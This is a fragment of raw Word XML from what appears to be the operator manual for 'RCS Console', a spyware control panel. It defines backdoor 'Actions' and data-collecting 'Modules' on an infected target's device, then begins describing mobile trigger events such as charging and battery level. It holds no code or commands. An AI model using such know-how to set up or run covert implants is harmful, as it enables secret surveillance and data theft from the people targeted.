          <w:p w:rsidR="0018169C" w:rsidRPr="002B2AEF" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0018169C" w:rsidTr="006311A1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="861" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="930" w:dyaOrig="780">
                <v:shape id="_x0000_i1070" type="#_x0000_t75" style="width:47.25pt;height:39pt" o:ole="">
                  <v:imagedata r:id="rId77" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1070" DrawAspect="Content" ObjectID="_1446455285" r:id="rId234"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="268" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8499" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="00671455" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Action</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0018169C" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>An Action is a backdoor activity that may be performed on the infected Target’s device.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0018169C" w:rsidRPr="00671455" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>To activate an Action, it must be called by an occurred Event.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0018169C" w:rsidRPr="002B2AEF" w:rsidTr="006311A1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="861" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="002B2AEF" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="268" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="002B2AEF" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8499" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="002B2AEF" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0018169C" w:rsidRPr="005701FD" w:rsidTr="006311A1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="861" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="005701FD" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="005701FD" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8499" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="005701FD" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0018169C" w:rsidRPr="002B2AEF" w:rsidTr="006311A1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="861" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="002B2AEF" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="268" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="002B2AEF" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8499" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="002B2AEF" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0018169C" w:rsidTr="006311A1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="861" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1449652A" wp14:editId="5EBAA7B7">
                  <wp:extent cx="590550" cy="561975"/>
                  <wp:effectExtent l="0" t="0" r="0"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0550" cy="561975"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="268" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8499" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="00671455" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Module</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0018169C" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>A Module is a specific type of data that can be retrieved from the infected Target’s device.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0018169C" w:rsidRPr="00671455" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Each Module can be activated or deactivated by an Action.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0018169C" w:rsidRDefault="0018169C" w:rsidP="0018169C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0018169C" w:rsidRDefault="0018169C" w:rsidP="0018169C">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0018169C" w:rsidRDefault="0018169C" w:rsidP="0018169C">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B41F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The image below shows the 3 different </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">types </w:t>
      </w:r>
      <w:r w:rsidR="00754335">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">of </w:t>
      </w:r>
      <w:r w:rsidRPr="008B41F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">elements and their </w:t>
      </w:r>
      <w:r w:rsidR="00BE0121">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>arrangement</w:t>
      </w:r>
      <w:r w:rsidRPr="008B41F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> by rows, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">within </w:t>
      </w:r>
      <w:r w:rsidRPr="008B41F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="008B41F1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">dvanced </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mode configuration window.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018169C" w:rsidRDefault="0018169C" w:rsidP="0018169C">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0018169C" w:rsidRDefault="00F7275D" w:rsidP="0018169C">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5360F95D" wp14:editId="41903DA6">
            <wp:extent cx="6120130" cy="3672205"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>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120130" cy="3672205"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018169C" w:rsidRPr="003B0583" w:rsidRDefault="0018169C" w:rsidP="0018169C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0018169C" w:rsidRDefault="00E17308" w:rsidP="0018169C">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>8.</w:t>
      </w:r>
      <w:r w:rsidR="0018169C">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">4 </w:t>
      </w:r>
      <w:r w:rsidR="0018169C" w:rsidRPr="00957E2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="0018169C">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> RCS </w:t>
      </w:r>
      <w:r w:rsidR="0018169C" w:rsidRPr="00957E2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Console ] </w:t>
      </w:r>
      <w:r w:rsidR="0018169C">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Operations &gt; </w:t>
      </w:r>
      <w:r w:rsidR="0018169C" w:rsidRPr="00674013">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidR="0018169C">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidR="0018169C" w:rsidRPr="00674013">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>peration #</w:t>
      </w:r>
      <w:r w:rsidR="0018169C">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidR="0018169C" w:rsidRPr="0059452D">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Target #</w:t>
      </w:r>
      <w:r w:rsidR="0018169C">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidR="0018169C" w:rsidRPr="008B41F1">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Factory #</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000450A6" w:rsidRPr="00AE05E8" w:rsidRDefault="000450A6" w:rsidP="009F3493">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc372642512"/>
      <w:r w:rsidRPr="00AE05E8">
        <w:lastRenderedPageBreak/>
        <w:t>Mobile Events Configuration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w:rsidR="000450A6" w:rsidRDefault="000450A6" w:rsidP="0018169C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0018169C" w:rsidRDefault="0018169C" w:rsidP="0018169C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>By clicking on the button Add Event you can add a new element in the line of Events.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018169C" w:rsidRDefault="0018169C" w:rsidP="0018169C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Within a </w:t>
      </w:r>
      <w:r w:rsidR="00BE36DD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mobile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Factory there’re </w:t>
      </w:r>
      <w:r w:rsidR="00CD39BE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> different Events available.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018169C" w:rsidRDefault="0018169C" w:rsidP="0018169C">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256"/>
        <w:gridCol w:w="6600"/>
      </w:tblGrid>
      <w:tr w:rsidR="0018169C" w:rsidTr="00B03598">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2766" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRDefault="00D915CC" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="2550" w:dyaOrig="840">
                <v:shape id="_x0000_i1071" type="#_x0000_t75" style="width:128.25pt;height:42pt" o:ole="">
                  <v:imagedata r:id="rId236" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1071" DrawAspect="Content" ObjectID="_1446455286" r:id="rId237"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6616" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="00671455" w:rsidRDefault="00CD39BE" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>AC</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0018169C" w:rsidRPr="00671455" w:rsidRDefault="00904B1C" w:rsidP="00904B1C">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00904B1C">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The AC </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>E</w:t>
            </w:r>
            <w:r w:rsidRPr="00904B1C">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">vent triggers an action when the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">infected Target’s device </w:t>
            </w:r>
            <w:r w:rsidRPr="00904B1C">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>is being charged</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w: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RPr="005701FD" w:rsidTr="00B03598">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2766" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="005701FD" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="005701FD" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6616" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="005701FD" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pP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Tr="00B03598">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2766" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRDefault="00A9456E" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="2550" w:dyaOrig="840">
                <v:shape id="_x0000_i1072" type="#_x0000_t75" style="width:128.25pt;height:42pt" o:ole="">
                  <v:imagedata r:id="rId238" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1072" DrawAspect="Content" ObjectID="_1446455287" r:id="rId239"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6616" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="00671455" w:rsidRDefault="00CD39BE" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Battery</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0018169C" w:rsidRPr="00671455" w:rsidRDefault="00073FB1" w:rsidP="00073FB1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00073FB1">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Battery </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>E</w:t>
            </w:r>
            <w:r w:rsidRPr="00073FB1">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">vent triggers an </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidRPr="00073FB1">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">ction when the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">infected Target’s device </w:t>
            </w:r>
            <w:r w:rsidRPr="00073FB1">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>battery charge level is within the specified range.</w:t>
            </w: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RPr="005701FD" w:rsidTr="00B03598">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2766" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="005701FD" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
